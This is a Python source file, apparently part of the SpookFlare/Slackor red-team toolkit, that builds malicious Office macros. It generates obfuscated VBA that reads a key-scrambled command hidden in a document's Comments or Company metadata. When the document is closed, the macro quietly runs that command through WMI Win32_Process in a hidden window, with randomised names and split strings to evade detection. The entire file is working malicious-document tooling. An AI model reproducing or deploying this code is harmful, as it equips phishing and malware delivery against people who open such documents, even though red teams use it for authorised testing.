github.com/Coalfire-Research/Slackor@v0.0.0-20191010164036-aa32a7f9250b/SpookFlare/lib/sfvba.py

github.com/Coalfire-Research/Slackor@v0.0.0-20191010164036-aa32a7f9250b/SpookFlare/lib/sfvba.py (about)

     1  # -*- coding: utf-8 -*-
     2  import random
     3  import string
     4  import base64
     5  
     6  def randomString():
     7      return ''.join([random.choice(string.ascii_letters) for n in range(12)])
     8  
     9  def generateKey():
    10      keys = "!#+%&/()=?_-*[]{}$><"
    11      return ''.join(random.sample(keys,len(keys)))
    12  
    13  def generateCmd(vbaKey, vbaCommand):
    14      return vbaKey.join([vbaCommand[i:i+1] for i in range(0, len(vbaCommand), 1)])
    15  
    16  def generateVBALauncher(vbaFileType, vbaCommand, vbaMetaName):
    17  
    18      if vbaFileType == "word":
    19          vbaFileType = "ActiveDocument"
    20      elif vbaFileType == "excel":
    21          vbaFileType = "ActiveWorkbook"
    22      elif vbaFileType == "powerpoint":
    23          vbaFileType = "ActivePresentation"
    24  
    25      if vbaMetaName == "Comments":
    26          vbaMetaName = "C\"&\"o\"&\"m\"&\"m\"&\"e\"&\"n\"&\"t\"&\"s"
    27      elif vbaMetaName == "Company":
    28          vbaMetaName = "C\"&\"o\"&\"m\"&\"p\"&\"a\"&\"n\"&\"y"
    29  
    30      vbaCommandKey = generateKey()
    31      vbaBaseCmd = generateCmd(vbaCommandKey, vbaCommand)
    32      vbaBaseCode = '''Sub Auto_Close()
    33      {0}
    34  End Sub
    35  
    36  Sub AutoClose()
    37      {0}
    38  End Sub
    39  
    40  Public Function {0}() As Variant
    41      Dim {1} As DocumentProperty
    42      For Each {1} In {8}.BuiltInDocumentProperties
    43          If {1}.Name = "{10}" Then
    44              Dim {2} As String
    45              {2} = Replace({1}.Value, "{9}", "")
    46              Const HIDDEN_WINDOW = 0
    47              Set {3} = GetObject("w"&"i"&"n"&"m"&"g"&"m"&"t"&"s"&":"&"\\"&"\\"&"."&"\\"&"r"&"o"&"o"&"t"&"\\"&"c"&"i"&"m"&"v"&"2")
    48              Set {4} = {3}.Get("W"&"i"&"n"&"3"&"2"&"_"&"P"&"r"&"o"&"c"&"e"&"s"&"s"&"S"&"t"&"a"&"r"&"t"&"u"&"p")
    49              Set {5} = {4}.SpawnInstance_
    50              {5}.ShowWindow = HIDDEN_WINDOW
    51              Set {6} = GetObject("w"&"i"&"n"&"m"&"g"&"m"&"t"&"s"&":"&"\\"&"\\"&"."&"\\"&"r"&"o"&"o"&"t"&"\\"&"c"&"i"&"m"&"v"&"2"&":"&"W"&"i"&"n"&"3"&"2"&"_"&"P"&"r"&"o"&"c"&"e"&"s"&"s")
    52              {6}.Create {2}, Null, {5}, {7}
    53          End If
    54      Next
    55  End Function'''
    56  
    57      loaderFinal = "'\n'Insert the following string to \""+vbaMetaName.replace("\"&\"", "")+"\" meta data section of file:\n'" + vbaBaseCmd + "\n'\n\n"
    58      loaderFinal += vbaBaseCode.format(randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), randomString(), vbaFileType, vbaCommandKey, vbaMetaName)
    59      return loaderFinal